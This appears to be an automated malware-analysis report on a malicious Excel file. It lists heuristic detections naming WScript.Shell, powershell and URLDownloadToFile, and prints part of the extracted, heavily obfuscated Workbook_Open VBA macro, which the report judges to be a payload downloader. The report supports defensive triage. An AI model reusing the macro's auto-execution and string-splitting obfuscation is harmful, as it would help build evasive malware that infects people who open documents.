MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This Excel file contains a Workbook_Open VBA macro that is heavily obfuscated. The macro uses CreateObject and a split string keyword obfuscation technique, indicating it is designed to execute malicious code. The presence of a Workbook_Open auto-execution routine and the obfuscated nature of the VBA code strongly suggest it acts as a downloader for a second-stage payload. The file is classified as malicious, and the primary IOC is the embedded macro file.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13569 bytes |
SHA-256: 67e1fad239a55d12337d95a99e17472823e98a238619276acabc6a3d72ba5a95 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
bqJQbp.StjN7qrpUubFBAzb5fJQ
While 18 = 45
Dim dctuWvOmyX As Boolean
Wend
Dim g2x7epT74t_ye9h As Worksheet
While 8 = 55
Dim W3Cpr3f2y9x As Boolean
Wend
Dim IZD16y5MLCTv As Worksheet
While 12 = 36
Dim jhPgdnMvxv2tu As Boolean
Wend
Dim rMnU5Ff2cvb As Worksheet
While 14 = 44
Dim oH3pDSuThP As Boolean
Wend
Dim EHl9WJtABWhS As Worksheet
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "bqJQbp"
Dim A9rvn758YkDTlfXlnpgVR9lc4eglhGxfrt2g7t2mC6R47AV3AzyT79EBUN1GXRYPvgk1n1n4x3RUprf2GnkqQchsnyJr2sMtfAFYYe As String
Dim QyZwRFoywno5jpg95u9GvvzVupOmsmtGNDI6__BbEYvZ6RKMHVMrHePd8DAlzA_I4fpffk95reAU9YZbdBdVX As String
Dim jF7uZzklBtKHZIDTHI6Xu78PmVBwW4OuCI7Q4FD4eJdqKFaY7GPtJaJmGoFCxwMGcYEOKuYAEB2ibO_e5kyOmeij8SIM9A_r7ULuAKMKqN As String
Dim ZKSgVAHkkfMes_BBnV2eQDb4BeHYEkpLNechf3A2LaCgi5tVrTT_5ksUsXd12rd_z_OLebetT_QzA4TEtuptO As Integer
Function MkO2Q6w3Euw1Utgqc_fJckDBVg5uzaX4UCo_wacWtW_VxFA(K_hCgCAw2kqgFnvYxwQA5k46xsGSZsFi3BV78_cJTEwNP2GauZwUiuNjEkMw4qVHdGmD)
While 15 = 39
Dim VSMKkTbxQSF5FUJ As Boolean
Wend
Dim dAkwo4S_9Pc As Worksheet
While 24 = 49
Dim gE6AvgYWUIz As Boolean
Wend
Dim lZb7s__TRuCLl2_ As Worksheet
While 5 = 53
Dim L4jCRM4FvU As Boolean
Wend
Dim Pfies_AmWITqJR As Worksheet
Dim mjTvCt_llrYXFByJyJkvvuUc2xqPjNH2FHFEAHiPb8OWDpwLd_5jiKD1M13MCsBVigQ85sHpjTRwe7XK_cudRgR4DN2INTMs62xfWyQu6N_N3PUOaqMh7fDAMV3p19ZOEhzlH2wJ
While 15 = 40
Dim n7rc3SGqTdvRz As Boolean
Wend
Dim kqSpj2shtwAC As Worksheet
While 24 = 36
Dim J8c42KYsXi7WQb As Boolean
Wend
Dim fGyNA6pIBpzmF As Worksheet
While 14 = 30
Dim RiU3IpZrUmvaQUh As Boolean
Wend
Dim aBs5WGTjre As Worksheet
Dim p3ZXX4I_6vNkrdPSQhsFJIGYyV1QNYLXVcKL9guAdpfd4TNDtqoXtEEft_iBC2yeiyNNRCSsvrldmmddFwfgtwmOWob97s7l1_5D__tpV5lBck3Ed_4OTPuuK8z
While 12 = 49
Dim uDU_6wDM_FIBowp As Boolean
Wend
Dim tJdBvriGr964N8 As Worksheet
While 28 = 53
Dim lWWkDqYzrMKN As Boolean
Wend
Dim XXU6NfWHEprBdMQ As Worksheet
While 22 = 54
Dim I8FHJYQYDwBum As Boolean
Wend
Dim ShfTrRl_or As Worksheet
While 20 = 32
Dim ix26nTFyXb As Boolean
Wend
Dim gO__M9CfIrTWaU As Worksheet
While 11 = 35
Dim IeHe8S1dNgT As Boolean
Wend
Dim RbmD68mRnuRZ As Worksheet
While 21 = 33
Dim NdShbd_MZYjdx8 As Boolean
Wend
Dim SYHGC_gt5e As Worksheet
Set p3ZXX4I_6vNkrdPSQhsFJIGYyV1QNYLXVcKL9guAdpfd4TNDtqoXtEEft_iBC2yeiyNNRCSsvrldmmddFwfgtwmOWob97s7l1_5D__tpV5lBck3Ed_4OTPuuK8z = CreateObject(QyZwRFoywno5jpg95u9GvvzVupOmsmtGNDI6__BbEYvZ6RKMHVMrHePd8DAlzA_I4fpffk95reAU9YZbdBdVX)
While 1 = 32
Dim YaLtq_wi1_3An As Boolean
Wend
Dim tW9NR322HO8nLIf As Worksheet
While 19 = 32
Dim rQ3dixHAPN As Boolean
Wend
Dim fUl_lsDQuWtC As Worksheet
While 10 = 53
Dim tMzBlPKNEd4OzhJ As Boolean
Wend
Dim XaykUr_vgO2 As Worksheet
A9rvn758YkDTlfXlnpgVR9lc4eglhGxfrt2g7t2mC6R47AV3AzyT79EBUN1GXRYPvgk1n1n4x3RUprf2GnkqQchsnyJr2sMtfAFYYe = Chr(102 - 4) & Chr(494 - 389) & Chr(162 - 52) & Chr(421 - 375) & Chr(223 - 125) & Chr(221 - 124) & Chr(368 - 253) & Chr(261 - 160) & Chr(324 - 270) & Chr(359 - 307)
While 22 = 41
Dim ee3UZuvnfnmfK1y As Boolean
Wend
Dim BGAZUHDgoz6u As Worksheet
While 13 = 33
Dim WTtaQutuoTtCHcK As Boolean
Wend
Dim Aeu4msfp1tF4rZ As Worksheet
While 22 = 45
Dim Mdc9XSvLTuZEH As Boolean
Wend
Dim pW8Q17BB36QAzn As Worksheet
Set mjTvCt_llrYXFByJyJkvvuUc2xqPjNH2FHFEAHiPb8OWDpwLd_5jiKD1M13MCsBVigQ85sHpjTRwe7XK_cudRgR4DN2INTMs62xfWyQu6N_N3PUOaqMh7fDAMV3p19ZOEhzlH2wJ = p3ZXX4I_6vNkrdPSQhsFJIGYyV1QNYLXVcKL9guAdpfd4TNDtqoXtEEft_iBC2yeiyNNRCS
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.